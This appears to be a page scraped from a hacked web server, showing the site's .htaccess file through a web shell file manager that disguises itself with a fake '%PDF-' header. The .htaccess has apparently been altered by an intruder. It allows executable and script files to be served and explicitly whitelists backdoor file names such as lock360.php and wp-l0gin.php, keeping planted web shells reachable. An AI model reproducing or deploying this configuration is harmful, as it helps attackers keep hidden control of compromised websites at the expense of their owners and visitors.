%PDF- %PDF-
| Direktori : /home/br2t/public_html/ |
| Current File : /home/br2t/public_html/.htaccess |
RewriteEngine on
DirectoryIndex index.html index.htm default.htm index.php index.php3 index.phtml index.php5 index.shtml mwindex.phtml
<FilesMatch ".(py|exe|php|css|js)$">
Order allow,deny
Allow from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine Off
</IfModule>
RewriteCond %{HTTP_HOST} ^br2t\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.br2t\.com$
RewriteRule ^(.*)$ "https\:\/\/br2t\.com\.br\/$1" [R=301,L]